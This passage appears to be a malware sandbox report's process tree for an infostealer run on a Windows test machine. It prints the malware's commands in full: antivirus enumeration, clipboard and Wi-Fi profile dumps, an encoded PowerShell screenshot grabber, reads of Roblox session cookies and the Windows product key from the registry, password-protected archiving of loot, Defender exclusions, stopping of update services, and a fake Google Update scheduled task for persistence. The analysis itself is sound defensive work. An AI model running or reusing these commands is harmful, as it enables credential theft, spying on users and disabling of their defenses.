                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                      8⤵
                                                                                                                        PID:1448
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:8564
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                        8⤵
                                                                                                                        • Clipboard Data
                                                                                                                        PID:4052
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-Clipboard
                                                                                                                          9⤵
                                                                                                                          • Clipboard Data
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1772
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                        8⤵
                                                                                                                          PID:2212
                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                            tasklist /FO LIST
                                                                                                                            9⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1924
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                          8⤵
                                                                                                                            PID:2320
                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                              tree /A /F
                                                                                                                              9⤵
                                                                                                                                PID:2296
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                              8⤵
                                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                              PID:2944
                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                netsh wlan show profile
                                                                                                                                9⤵
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                PID:5064
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                              8⤵
                                                                                                                                PID:1504
                                                                                                                                • C:\Windows\system32\systeminfo.exe
                                                                                                                                  systeminfo
                                                                                                                                  9⤵
                                                                                                                                  • Gathers system information
                                                                                                                                  PID:4728
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                8⤵
                                                                                                                                  PID:1944
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                    9⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5244
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fnvolsti\fnvolsti.cmdline"
                                                                                                                                      10⤵
                                                                                                                                        PID:6988
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA52.tmp" "c:\Users\Admin\AppData\Local\Temp\fnvolsti\CSCED6811DC33AA4A6DA7BCECA91D8D526B.TMP"
                                                                                                                                          11⤵
                                                                                                                                            PID:7024
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      8⤵
                                                                                                                                        PID:6312
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          9⤵
                                                                                                                                            PID:6568
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                          8⤵
                                                                                                                                            PID:6640
                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                              tree /A /F
                                                                                                                                              9⤵
                                                                                                                                                PID:6708
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                              8⤵
                                                                                                                                                PID:6724
                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                  tree /A /F
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6796
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6816
                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                      tree /A /F
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6868
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6888
                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                          tree /A /F
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6936
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5772
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                              9⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5832
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5968
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                9⤵
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:6068
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:7440
                                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                                  getmac
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:5384
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46162\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\OE5Gx.zip" *"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:7536
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI46162\rar.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI46162\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\OE5Gx.zip" *
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:7596
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5552
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic os get Caption
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:7884
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:7964
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic computersystem get totalphysicalmemory
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:8072
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:8164
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic csproduct get uuid
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:6400
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:6440
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:2020
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:8304
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                    PID:8360
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:8392
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:8448
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:6348
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5212
                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                            sc stop UsoSvc
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:4876
                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                            sc stop WaaSMedicSvc
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:6796
                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                            sc stop wuauserv
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:6724
                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                            sc stop bits
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:6764
                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                            sc stop dosvc
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:6884
                                                                                                                                                                        • C:\Windows\System32\dialer.exe
                                                                                                                                                                          C:\Windows\System32\dialer.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6868
                                                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                                                            C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6872
                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                              C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:6900
                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                              C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:7304
                                                                                                                                                                              • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                                                                "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\ProtectSplit.mov"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:5472
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:7664
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:8696
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5672
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5688
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop UsoSvc
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:500
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop WaaSMedicSvc
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:1224
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop wuauserv
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:3616
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
